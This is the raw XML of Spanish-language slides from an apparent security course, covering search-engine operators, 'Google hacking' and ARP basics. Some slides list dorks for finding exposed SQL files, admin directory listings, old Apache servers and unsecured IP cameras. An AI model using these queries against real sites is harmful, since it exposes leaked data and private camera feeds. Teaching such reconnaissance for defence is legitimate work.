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313" r:id="rId6"/>
    <p:sldId id="315" r:id="rId7"/>
    <p:sldId id="314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58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8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00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42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0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95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47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26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4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03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39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0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8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AB11-C9F7-47E2-987A-40906C25ECD1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4CD1-FDFF-4DAA-BA7F-A301DFAA2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4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r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wa.co.uk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urceforge.net/projects/mutillidae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012"/>
            <a:ext cx="4499653" cy="17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400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513074"/>
            <a:ext cx="1219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Búsqueda dentro de la caché (cache:) -&gt; Google mantiene copias de las páginas a las que han tenido acceso a través de su motor de búsqueda.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cache:www.portantier.com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lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mantiene un cache de la ultima vez que accedió google.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-E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Términos que deseamos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exlcuir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(-) -&gt; si incluimos este signo – delante de una palabra, esta indicando que no queremos que aparezcan páginas que contengan ese término.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>* Ej.: antivirus -software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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0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97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513074"/>
            <a:ext cx="12191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Rellenar espacio en blanco (*) -&gt; si incluimos un * en una consulta, estaremos indicando a Google que intente considerar ese símbolo como un marcador de posición de términos desconocidos y que, a continuación busque los mejores resultados.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 Ej</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.: el presidente voto * la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ley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El operador OR -&gt; una o varias palabas en los resultados de búsqueda, debe especificarse el operador “OR” en mayúscula, este operador se puede sustituir por el (|).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Ej.: Linux OR Windows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Ej.: Linux | Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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3911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513074"/>
            <a:ext cx="1219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Buscar archivos confidenciales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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>com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ext:sql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site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:*.com.ar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inurl:public_html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index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intitle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ext:pdf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inurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wp-content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gob.ar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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intitle:index.of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		-&gt; el punto (.) es un comodín que puede ser </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>				     remplazado por cualquier carácter.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Intitle:index.of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parent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directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“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Intitle:index.of.admin</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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1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401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513074"/>
            <a:ext cx="1219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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Busqueda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de servicios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“Apache/” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intitle:index.of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“Apache/1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intitle:index.of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"ftp" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intitle:index.of</a:t>
            </a:r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Cámaras IP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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:/view.shtml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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inurl:ViewerFrame?Mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inurl:axis-cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jpg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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intitle:axis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intile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:”video server”</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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287714"/>
            <a:ext cx="7333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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" b="0" cap="none" spc="0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Database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1" y="2170572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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>una técnica en informática que utiliza operadores para filtrar información en el buscador de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Además podemos encontrar otras aplicaciones de agujeros de seguridad en la configuración y el código informático que se utilizan en las páginas web.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3600" dirty="0" smtClean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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se actualiza constantemente.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3600" dirty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07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279401"/>
            <a:ext cx="7333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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" b="0" cap="none" spc="0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Database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1" y="217057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https://www.exploit-db.com</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3600" dirty="0" smtClean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1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279401"/>
            <a:ext cx="39236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Bing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-1" y="1778274"/>
            <a:ext cx="1219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Búsqueda por contenido (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:) -&gt; busca por contenidos.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contains:aerolineas</a:t>
            </a:r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Búsqueda de tipo de archivo (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filetype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:) -&gt; busca por tipo de archivo.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Ej.: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filetype:pdf</a:t>
            </a:r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Búsqueda de tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (IP:) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nos muestra en una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pública cuantos dominios comparten el servidor público.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Ej.: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> www.taringa.net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Ej.: ip:104.16.252.64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8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203824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El protocolo de resolución de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nombres </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(ARP, del ingles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Address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Resolution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Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ),  es un protocolo de comunicación de la capa de enlace de datos del modelo OSI.  Dicho protocolo se encarga de encontrar la dirección de hardware (Ethernet MAC) que corresponde a una dirección IP determinada. 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4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Funcionamiento de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arp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AR" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Supongamos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que queremos realizar un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> desde el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>equipo A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>equipo B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AR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="3200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# ping 192.168.1.11</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="3600" dirty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2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93074" y="1482132"/>
            <a:ext cx="7549689" cy="45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400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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Es la utilización de operadores de búsqueda para filtrar la información.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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se pueden buscar vulnerabilidades de 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9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Funcionamiento de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arp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Lo que hace es enviar un paquete ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>broadcast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> preguntando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quien </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>es la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip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192.168.1.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, dentro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>paquete de envió manda como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>source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sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>address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la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mac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10:f0:05:14:dd:7c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>source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 destino </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FF:FF:FF:FF:FF:FF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de esta forma manda un paquete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>broadcast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sender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sz="28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 192.168.1.108 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y 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target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="28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 192.168.1.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty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  <a:p>
            <a:endParaRPr lang="es-AR" sz="3600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="3600" dirty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5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394066" y="1535645"/>
            <a:ext cx="6870642" cy="445994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Funcionamiento de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arp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r>
              <a:rPr lang="es-AR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Una vez  encontrado la dirección </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" b="1" dirty="0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s-AR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, manda un paquete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>unicast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, vemos que mediante el comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> -n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, tenemos la tabla de cache de resolución</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.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4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Funcionamiento de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arp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AR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arp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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–n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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
